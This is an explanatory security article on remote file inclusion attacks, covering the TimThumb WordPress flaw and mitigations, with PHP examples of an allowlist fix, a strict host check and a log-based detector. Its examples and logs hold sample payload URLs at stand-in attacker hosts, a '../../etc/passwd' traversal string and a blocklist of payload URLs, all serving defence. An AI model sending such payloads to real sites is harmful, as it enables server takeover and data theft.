RFI Attack

What is an RFI attack?

As the name indicates, a remote file inclusion (RFI) attack abuses a web application that builds the file name for an include or require statement from user-supplied input without validating it. The attacker supplies a URL in place of a local file name, the server fetches the attacker's file from that remote location and executes it as part of the application (in PHP this needs the allow_url_include setting to be on; with it off, the same flaw usually still allows local file inclusion). The attacker's ability to carry this out relies on improper input validation on the victim server. The potential implications of an RFI attack are many and varied (we'll look at them in more depth further down the page).
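The following is an added example, not code from the original article: the classic PHP include pattern that makes RFI possible, beside a hardened version that maps the parameter onto a fixed allowlist. The pages/ directory, the page names and the probe strings are assumptions for illustration.

```php
<?php
// Added example (not from the original article). Assumes page templates live
// in ./pages/ and are selected with a "page" query parameter; both are assumptions.

// VULNERABLE: the user controls the path handed to include(). With
// allow_url_fopen and allow_url_include enabled, ?page=http://attacker.example/shell
// makes the server fetch and execute attacker-supplied PHP. Even with remote
// includes disabled, ?page=../../etc/passwd style local file inclusion remains.
function render_page_vulnerable(string $page): void
{
    include $page . '.php';
}

// HARDENED: map user input onto a fixed allowlist of known templates and never
// build a filesystem path from the raw parameter.
const ALLOWED_PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolve_page(string $page): ?string
{
    // Only exact allowlist keys survive this lookup: no path separators,
    // no URL scheme, no null bytes can reach include().
    if (!array_key_exists($page, ALLOWED_PAGES)) {
        return null;
    }
    return __DIR__ . '/pages/' . ALLOWED_PAGES[$page];
}

function render_page_safe(string $page): void
{
    $path = resolve_page($page);
    if ($path === null) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include $path;
}

// Demonstration with constructed inputs (no HTTP request needed):
$probes = [
    'home',
    'http://attacker.example/shell.txt',
    '../../etc/passwd',
];
foreach ($probes as $probe) {
    $resolved = resolve_page($probe);
    printf("%-40s -> %s\n", $probe, $resolved === null ? 'rejected' : basename($resolved));
}
// Also recommended, in php.ini rather than in code:
//   allow_url_include = Off   ; refuse http:// and ftp:// targets for include/require
//   allow_url_fopen   = Off   ; unless the application genuinely needs remote fopen
```

Running the script prints "home -> home.php" and rejects the other two probes. The point of the allowlist is that the parameter is never used as a path at all, so neither remote nor local inclusion is reachable, whatever the PHP configuration happens to be.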


RFI attacks are common

Whilst they're not necessarily as notorious as network layer attacks (in the public eye, at least), RFI attacks are very common; by some estimates they account for around 25% of all web-based attacks. What makes them so popular amongst those looking to attack a site? Two reasons: firstly, they are easy to automate (scanners probe large numbers of sites for include parameters and feed them the same payload URL), and secondly they have a high damage potential, since a successful include runs the attacker's code on the server. Essentially, they offer the attacker the opportunity to create the maximum amount of chaos with minimum effort.

How devastating can an RFI attack be?

At its worst, an RFI attack can be incredibly damaging, because the included file runs with the privileges of the web application. It can lead to the following problems.

The website being taken over.  The attacker will be able to obtain complete control of the website, and will be able to delete, deface and modify it according to their wishes.

The server being accessed.  Perhaps even more serious than the website takeover, the attacker may be able to gain a foothold on the server itself, meaning that all of the websites hosted on it could be compromised.  There is also the potential for the server to be conscripted into a botnet and used to launch attacks, such as DDoS, against other sites.

Data theft.  An attacker who can run code on the server can read whatever the application can: financial information, names and addresses, purchase histories.  All of these can be used to aid financial theft.

TimThumb

One of the most common recent examples of an RFI attack was perpetrated using the TimThumb.php file found in many websites, particularly those that run the WordPress CMS.

The TimThumb.php file isn't, in itself, malicious.  It's actually a utility used to re-size images on a website, and many WordPress themes bundle it.  The trouble with the utility was that its design was inherently risky: to serve remote images it fetched them and wrote them into a cache directory that visitors to the website could access.  Because the check on which remote sites were permitted only did a partial (substring) match on the hostname, an attacker-controlled domain that merely contained an allowed site's name passed the check, so attackers were able to make the script fetch a file containing arbitrary PHP code into the TimThumb cache directory and then execute it by requesting it from the web.
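To make the hostname problem concrete, here is an added example (not TimThumb's own code) that puts a substring-style host check beside a strict one. The allowlist of hosts and the sample URLs are constructed for illustration.

```php
<?php
// Added example (not TimThumb's own code): why a substring match on the
// hostname is not a hostname check. ALLOWED_HOSTS and the samples are assumptions.

const ALLOWED_HOSTS = ['flickr.com', 'picasa.com', 'blogger.com', 'img.youtube.com'];

// Partial match, in the spirit of the vulnerable check: passes if any allowed
// name appears anywhere in the URL string.
function host_allowed_substring(string $url): bool
{
    foreach (ALLOWED_HOSTS as $allowed) {
        if (strpos($url, $allowed) !== false) {
            return true;
        }
    }
    return false;
}

// Strict match: parse the URL, require http(s), and compare the exact host
// (case-insensitively) against the allowlist. A lookalike domain such as
// blogger.com.evil.example, or an allowed name hidden in the userinfo or
// query string, no longer passes.
function host_allowed_strict(string $url): bool
{
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return false;
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return false;
    }
    $host = strtolower($parts['host']);
    foreach (ALLOWED_HOSTS as $allowed) {
        if ($host === strtolower($allowed)) {
            return true;
        }
    }
    return false;
}

$samples = [
    'http://img.youtube.com/vi/abc/0.jpg',          // genuinely allowed
    'http://blogger.com.evil.example/x.php',        // lookalike domain
    'http://evil.example/a.php?u=flickr.com',       // allowed name in the query string
    'http://flickr.com@evil.example/x.php',         // allowed name as userinfo; host is evil.example
];
foreach ($samples as $url) {
    printf("%-45s substring=%s strict=%s\n", $url,
        host_allowed_substring($url) ? 'pass' : 'fail',
        host_allowed_strict($url) ? 'pass' : 'fail');
}
// Even with a strict host check, a fetched file should be verified as an image
// (e.g. with getimagesize()) and never written under a name the web server
// will execute; the host check alone does not make the cache directory safe.
```

Only the first sample passes the strict check; the substring check passes all four, which is exactly the gap an attacker needs. The closing comment matters as much as the check: a cache directory under the web root that stores fetched content with an executable extension turns any bypass of the host check into remote code execution.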

Combating Zero Day Attacks

Many RFI attacks take the form of 'zero day' assaults, i.e. they are launched as soon as a weakness becomes known, often before a patch is available.  It's therefore important to try to mitigate potential avenues of attack in advance.  Incapsula, a website security firm, recently introduced reputation-based protection built on in-depth research into RFI attacks.

The company's research showed that even across different attackers and campaigns, the same RFI payload URLs were being reused repeatedly against different targets.  This meant that, combined with Incapsula's crowdsourcing technology (pooling attack data across the sites it protects), a large library of these locations could be documented and form part of an effective early warning system: a request that tries to include a URL already seen in another attack can be blocked before the targeted site's specific weakness is even known.
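The same observation can be applied on a single server. The following is an added example, not Incapsula's product or code, of a minimal log-based detector: it flags requests whose parameters reference a URL already known to host RFI payloads, and also flags any include-style parameter whose value is itself a URL, which catches a new payload location on its first use. The log lines, the parameter-name list and the blocklist are all constructed for illustration.

```php
<?php
// Added example (not Incapsula's code): log-based RFI detection. The blocklist,
// the parameter names and the access-log lines below are constructed.

// URLs previously seen hosting RFI payloads (constructed blocklist)
const KNOWN_BAD_URLS = [
    'http://evil.example/shell.txt',
    'http://203.0.113.5/r57.txt',
];

// Parameter names commonly used to select a file to include (assumed list)
const INCLUDE_PARAMS = ['page', 'file', 'include', 'path', 'template', 'src'];

// Constructed common-log-format entries: one clean page view, one reuse of a
// known payload URL, one TimThumb-style probe with a new URL, one static request.
$sampleLog = <<<'LOG'
198.51.100.7 - - [10/Oct/2013:13:55:36 +0000] "GET /index.php?page=home HTTP/1.1" 200 512
198.51.100.9 - - [10/Oct/2013:13:55:40 +0000] "GET /index.php?page=http://evil.example/shell.txt? HTTP/1.1" 200 1480
203.0.113.22 - - [10/Oct/2013:13:56:02 +0000] "GET /wp-content/themes/x/timthumb.php?src=http://blogger.com.evil.example/a.php HTTP/1.1" 200 9
198.51.100.7 - - [10/Oct/2013:13:56:10 +0000] "GET /about.php HTTP/1.1" 200 300
LOG;

// Pull the client IP and request target out of one log line; null if it does
// not look like a common-log-format entry.
function parse_request(string $line): ?array
{
    if (!preg_match('/^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*"/', $line, $m)) {
        return null;
    }
    return ['ip' => $m[1], 'method' => $m[2], 'target' => $m[3]];
}

// Inspect one request target; returns a list of findings (empty when clean).
function inspect_request(string $ip, string $target): array
{
    $findings = [];
    $query = parse_url($target, PHP_URL_QUERY);
    if ($query === null || $query === false) {
        return $findings;
    }
    parse_str($query, $params);
    $badUrls = array_map('strtolower', KNOWN_BAD_URLS);
    foreach ($params as $name => $value) {
        if (!is_string($value)) {
            continue;
        }
        // Attackers often append "?" so the vulnerable script's own suffix
        // (e.g. ".php") lands in the query string of their URL; strip it.
        $candidate = rtrim($value, '?');
        if (in_array(strtolower($candidate), $badUrls, true)) {
            $findings[] = sprintf('%s: parameter "%s" references known RFI payload %s',
                $ip, $name, $candidate);
        } elseif (in_array(strtolower((string) $name), INCLUDE_PARAMS, true)
                  && preg_match('#^[a-z][a-z0-9+.-]*://#i', $candidate)) {
            $findings[] = sprintf('%s: include-style parameter "%s" carries a remote URL %s',
                $ip, $name, $candidate);
        }
    }
    return $findings;
}

foreach (explode("\n", $sampleLog) as $line) {
    $req = parse_request($line);
    if ($req === null) {
        continue;
    }
    foreach (inspect_request($req['ip'], $req['target']) as $finding) {
        echo $finding, "\n";
    }
}
```

On the constructed log this reports the second line (known payload URL, the reputation case) and the third line (new URL in an include-style parameter, the zero-day case) and stays silent on the other two. Feeding a blocklist of URLs observed at other sites into KNOWN_BAD_URLS is the single-server equivalent of the shared early warning system described above.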

In conclusion

Needless to say, RFI represents a very serious threat to any modern website or server.  It is the responsibility of any website administrator to put mitigations in place that are strong enough to deal with attacks of this form: validate and allowlist anything that selects a file to include, keep remote includes disabled, keep bundled scripts such as TimThumb up to date, and consider a reputation-based filter in front of the site.  Not doing so could be a decision that ends up costing thousands of dollars.
